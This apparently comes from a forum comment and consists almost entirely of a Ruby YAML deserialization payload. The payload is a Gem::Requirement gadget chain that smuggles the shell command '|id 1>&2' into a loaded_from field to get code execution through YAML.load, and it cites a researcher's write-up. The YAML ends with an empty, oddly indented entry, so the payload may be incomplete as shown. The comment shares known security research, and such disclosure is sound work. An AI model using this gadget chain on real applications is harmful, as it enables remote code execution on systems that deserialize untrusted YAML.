The same gadget chain can alsobe used to exploit YAML.load [0] with the following:

    --- !ruby/object:Gem::Requirement
    requirements:
      !ruby/object:Gem::DependencyList
      specs:
      - !ruby/object:Gem::Source::SpecificFile
        spec: &1 !ruby/object:Gem::StubSpecification
          loaded_from: "|id 1>&2"
      - !ruby/object:Gem::Source::SpecificFile
          spec:

[0] https://staaldraad.github.io/post/2019-03-02-universal-rce-r...